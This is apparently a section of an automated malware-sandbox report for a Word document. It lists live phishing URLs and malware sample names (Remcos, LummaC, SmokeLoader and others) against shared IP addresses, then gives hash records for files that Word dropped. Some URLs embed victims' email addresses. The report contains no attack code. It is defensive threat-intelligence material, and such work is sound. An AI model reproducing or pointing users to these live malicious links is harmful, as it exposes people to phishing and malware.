                                                                                                                                                                                                                                                                eu-eb2.3lift.comWordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                http://www.lapumpandvalve.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                http://bqrsy.seekinvest.co/4xnSRn15308idbK1376jqowxkjgss14745HXOATNJZKAZVKSP98PXJV17762C16#8gfe0i2lkfqxzo4xifhbmdsxykiibapo1vlzxy35431iw10ly9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                https://go.microsoft.com/fwlink/?LinkID=2092201&clcid=0x407Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                CourtOrder.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                http://link.Docusign-signon@serverconnecting-clientfiles-auth38392919.simplemagiclink.com/authenticating#MARSHA.ROWLAND@CHEROKEEBRICK.COMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                https://events.csiro.au/sitecore/RedirectUrlPage.aspx?ec_contact_id=1DA68C6AF536E76F6A42373E99CB368C&ec_message_id=7AB222E9302B4AB8A943E9FD7AAE1DF3&ec_url=https://hr.economictimes.indiatimes.com/etl.php?url=electraconsultants.com/redirecting?maddie.capes@msdmining.com.auGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                http://54rtssgfsedzd.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                                                • 13.248.245.213
                                                                                                                                                                                                                                                                http://conubuseprologin.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 76.223.111.18
                                                                                                                                                                                                                                                                d2u28gf9o4d1cv.cloudfront.netCourtOrder.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 18.155.153.37
                                                                                                                                                                                                                                                                PIay__Now__Hi Goodmorning!#7202221511.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 18.239.94.6
                                                                                                                                                                                                                                                                https://forms.office.com/e/c7HLGpx1PyGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 18.244.140.21
                                                                                                                                                                                                                                                                https://xiy.kpidevi.com/ex2S/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.226.175.96
                                                                                                                                                                                                                                                                https://forms.office.com/r/2sQKUFgdzEGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 65.9.66.10
                                                                                                                                                                                                                                                                Transaction record 5445-97660.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                                                • 65.9.66.10
                                                                                                                                                                                                                                                                https://happy-blue-crow.slab.com/posts/daisha-carroll-has-granted-you-access-to-a-secured-document-jbjy13i6?shr=A70L7MlmeCkUlCNZ0PGMC0qsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.226.175.50
                                                                                                                                                                                                                                                                https://forms.office.com/r/iNrLDTEJvmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 3.164.163.31
                                                                                                                                                                                                                                                                http://amzn.openinapp.link/7rmpiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 65.9.66.76
                                                                                                                                                                                                                                                                Inv59895_abubakar.iddrisu.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 65.9.66.76
                                                                                                                                                                                                                                                                edger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.comCourtOrder.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 35.155.114.52
                                                                                                                                                                                                                                                                https://xiy.kpidevi.com/ex2S/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 50.112.145.153
                                                                                                                                                                                                                                                                https://forms.office.com/r/2sQKUFgdzEGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 44.240.119.186
                                                                                                                                                                                                                                                                https://happy-blue-crow.slab.com/posts/daisha-carroll-has-granted-you-access-to-a-secured-document-jbjy13i6?shr=A70L7MlmeCkUlCNZ0PGMC0qsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 54.71.216.166
                                                                                                                                                                                                                                                                https://m.exactag.com/ai.aspx?tc=d9498808bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Acatenconstrucoes.com%2Ffrest#c2NvdHQuam9obnNvbkB4Y2VsZW5lcmd5LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.34.68.193
                                                                                                                                                                                                                                                                https://0x7gg.bjhxof.ru/0x7gG/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 54.244.165.139
                                                                                                                                                                                                                                                                https://www.hcjsqc.cn/?jgfjjjloGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.33.170.203
                                                                                                                                                                                                                                                                https://streamviewspan.com/~am~/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 34.208.9.187
                                                                                                                                                                                                                                                                bluemonster.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 44.226.93.88
                                                                                                                                                                                                                                                                https://bsetsy.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 35.155.129.42
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                ATGS-MMD-ASUShttps://www.google.com/url?q=//www.google.co.ve/amp/s/VKsi4WQ0AEy6WTMmK7.meyalli.org/hyhidelom/gtgtihyiopl/tgtdsxsfkok/dGFtbXkub2tlZWZmZUBpYWdjYXJnby11ay5jb20=Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 34.36.217.40
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 57.129.18.111
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 57.128.187.108
                                                                                                                                                                                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                                                                                                                                                                                • 34.160.111.145
                                                                                                                                                                                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                                                                                                                                                                                • 34.160.111.145
                                                                                                                                                                                                                                                                http://zegsu.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 34.36.217.40
                                                                                                                                                                                                                                                                http://shawupdatingservic.wixstudio.io/my-siteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 34.149.206.255
                                                                                                                                                                                                                                                                http://flow.page/eastlink.caGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 34.144.206.118
                                                                                                                                                                                                                                                                https://multievmosdapp.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 34.36.216.150
                                                                                                                                                                                                                                                                https://s--auth----trezorwallet.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 34.128.128.0
                                                                                                                                                                                                                                                                AMAZON-02UShttps://email.eventtia-mailer.com/c/eJwUyztuwzAMANDTSJsM8ROaGTR0yTUKiXQboREc2K6B3r7w9pbn5Uv0BhCXAjOiZMyo8VnEZiES8kV5IWB3vQPcSIUxa-PYi0g1R2xNmssnWXasxm713kyNswoHzv2dYMZEkFATgE6j9ld8ledxvPdAHwEfAR-jnn1M23rxZ49b-au0t_U3cP6-wmTriGfB_wAAAP__1csxIwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 54.229.239.169
                                                                                                                                                                                                                                                                https://www.google.com/url?q=//www.google.co.ve/amp/s/VKsi4WQ0AEy6WTMmK7.meyalli.org/hyhidelom/gtgtihyiopl/tgtdsxsfkok/dGFtbXkub2tlZWZmZUBpYWdjYXJnby11ay5jb20=Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 18.245.31.48
                                                                                                                                                                                                                                                                PDF-OBLIGACION-4543663584-05-08-25-65785324.batGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 185.166.143.50
                                                                                                                                                                                                                                                                https://camdenhouse-help.freshdesk.com/en/support/solutions/articles/154000182700-shared-secure-business-documentsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 54.231.161.176
                                                                                                                                                                                                                                                                https://mustard-sparrow-lc122v.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.84.150.39
                                                                                                                                                                                                                                                                http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 44.239.66.128
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 44.227.62.242
                                                                                                                                                                                                                                                                RummikubSetup_ex64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.227.219.37
                                                                                                                                                                                                                                                                https://www.hostize.com/v/n07kGU3-miGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.89.62.17
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.211.65.102
                                                                                                                                                                                                                                                                AMAZON-02UShttps://email.eventtia-mailer.com/c/eJwUyztuwzAMANDTSJsM8ROaGTR0yTUKiXQboREc2K6B3r7w9pbn5Uv0BhCXAjOiZMyo8VnEZiES8kV5IWB3vQPcSIUxa-PYi0g1R2xNmssnWXasxm713kyNswoHzv2dYMZEkFATgE6j9ld8ledxvPdAHwEfAR-jnn1M23rxZ49b-au0t_U3cP6-wmTriGfB_wAAAP__1csxIwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 54.229.239.169
                                                                                                                                                                                                                                                                https://www.google.com/url?q=//www.google.co.ve/amp/s/VKsi4WQ0AEy6WTMmK7.meyalli.org/hyhidelom/gtgtihyiopl/tgtdsxsfkok/dGFtbXkub2tlZWZmZUBpYWdjYXJnby11ay5jb20=Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 18.245.31.48
                                                                                                                                                                                                                                                                PDF-OBLIGACION-4543663584-05-08-25-65785324.batGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 185.166.143.50
                                                                                                                                                                                                                                                                https://camdenhouse-help.freshdesk.com/en/support/solutions/articles/154000182700-shared-secure-business-documentsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 54.231.161.176
                                                                                                                                                                                                                                                                https://mustard-sparrow-lc122v.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.84.150.39
                                                                                                                                                                                                                                                                http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 44.239.66.128
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 44.227.62.242
                                                                                                                                                                                                                                                                RummikubSetup_ex64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.227.219.37
                                                                                                                                                                                                                                                                https://www.hostize.com/v/n07kGU3-miGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.89.62.17
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.211.65.102
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                1138de370e523e824bbca92d049a3777https://cdn.polyfill.io/v2/polyfill.min.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                https://mustard-sparrow-lc122v.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                YouTubeAppSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                https://gbshost.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                rYourfilenamewithoutextensiongoeshere.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                TikTokDownloader_3.1_ex64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                FPSUnlocker_x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                TikTokDownloader_3.1_ex64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                https://u8cypa.ontralink.com/c/s/6Ubz/sViK/v/ps/vsP/6AZrDf/sVTiZk8S95/P/P/60Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 173.222.162.32
                                                                                                                                                                                                                                                                28a2c9bd18a11de089ef85a160da29e4https://email.eventtia-mailer.com/c/eJwUyztuwzAMANDTSJsM8ROaGTR0yTUKiXQboREc2K6B3r7w9pbn5Uv0BhCXAjOiZMyo8VnEZiES8kV5IWB3vQPcSIUxa-PYi0g1R2xNmssnWXasxm713kyNswoHzv2dYMZEkFATgE6j9ld8ledxvPdAHwEfAR-jnn1M23rxZ49b-au0t_U3cP6-wmTriGfB_wAAAP__1csxIwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                https://rfindustria.com.br/wp-content/uploads/Nota_2024brs.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                https://www.google.com/url?q=//www.google.co.ve/amp/s/VKsi4WQ0AEy6WTMmK7.meyalli.org/hyhidelom/gtgtihyiopl/tgtdsxsfkok/dGFtbXkub2tlZWZmZUBpYWdjYXJnby11ay5jb20=Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                https://camdenhouse-help.freshdesk.com/en/support/solutions/articles/154000182700-shared-secure-business-documentsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                https://promaquina.com/wp-admin/indexx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                http://proph.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                https://proph.co.uk/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                https://mustard-sparrow-lc122v.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.190.159.73
                                                                                                                                                                                                                                                                • 40.68.123.157
                                                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1XXLY2EitTc.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                elton.exeGet hashmaliciousPureCrypter, LummaC, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                elton.exeGet hashmaliciousPureCrypter, LummaC, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                fKYrTm48vZ.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                Step 2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                l;gk,ewr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                SalexCheat.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                MSG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                SecuriteInfo.com.Trojan.005b910e1.19493.10656.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.123.243.83
                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1869
                                                                                                                                                                                                                                                                Entropy (8bit):5.090522178838791
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:cG3JFnzyr3InzysWkSyrpednzyrXHnzyMySyKUdSyqIASyEfDVdyDhdyBkJdyOfl:hF27I2sVbded2rH2MybKUdbqIAbiDVE9
                                                                                                                                                                                                                                                                MD5:7DA0EE85764356FD3352022D46D0B5D9
                                                                                                                                                                                                                                                                SHA1:FFAD4A979F8C9BD7E3014DDCA16F7ABFEA51E939
                                                                                                                                                                                                                                                                SHA-256:670B52CD9F59914282BBE9A42121CDBB7FEAD5E3A114F259D8211409FA960425
                                                                                                                                                                                                                                                                SHA-512:B0483AA92E5D2D2DA229C13F9BAEEEF50298F4E304C1167EC76D747BE45EADC9D3AE3F89FFE95A02D1FE023498C3A0FCB3A529E83C17C741B3B12CE58121DF08
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos Display_45876482</Id><LAT>2023-10-04T10:58:38Z</LAT><key>29442803203.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-04T10:58:38Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-04T10:58:38Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-04T10:58:38Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-04T10:58:38Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-04T10:58:38Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):521377
                                                                                                                                                                                                                                                                Entropy (8bit):4.9084889265453135
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                                                                                                                                                MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                                                                                                                                                SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                                                                                                                                                SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                                                                                                                                                SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):773040
                                                                                                                                                                                                                                                                Entropy (8bit):6.55939673749297
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                                                                                                                                                MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                                                                                                                                                SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                                                                                                                                                SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                                                                                                                                                SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                Entropy (8bit):3.844597080147259
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxsxxCxl9Il8u4vqPsnSj7/2+bSV6vZLzDbd1rc:vmYsqPl26vZLzY
                                                                                                                                                                                                                                                                MD5:452106DF74DFAE1692F74E3D3CE3ED85
                                                                                                                                                                                                                                                                SHA1:747C466F51B5F0CBD4D40D1E760FF35EA1A89B4C
                                                                                                                                                                                                                                                                SHA-256:E99D11C11C04C10685EBB81ED04FEC2AD94684D16A0A6686B16A686DBA78D8DF
                                                                                                                                                                                                                                                                SHA-512:6FA8D2B34C2092DA4E70059226266975C4C3B693B4A83F118298596FF3F65DF521B9F56E476A6561FD970A1178051805A099B6AE9F87160EB44F7B021F5B5D55
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.M.s.9.F.c.P.s.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.W.R.N.r.Z.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4542
                                                                                                                                                                                                                                                                Entropy (8bit):3.995293301959576
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:mY4xgg18Qig9kEZuEpFHKuQqjF/Mps5eW67wbvG:mRg4xig/AY6IFx5eW67wbu
                                                                                                                                                                                                                                                                MD5:BD47C1CA517682170A736A85D4355436
                                                                                                                                                                                                                                                                SHA1:E99680F8AD9337BE12B671523B74FEC333C423D2
                                                                                                                                                                                                                                                                SHA-256:6EC24A94AFD0AD7CAB6A12AA8231FA14D6AF05493867620040137B67072758BA
                                                                                                                                                                                                                                                                SHA-512:B74EA3D2A182B1A630891FFD39F0C4A83C122D6083816CC4FA8E5191D4DE6E40A7CA07AF6E81079D2991C5BB15C0E2FDF703D7657F9F86B34AC1725BAD808723
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
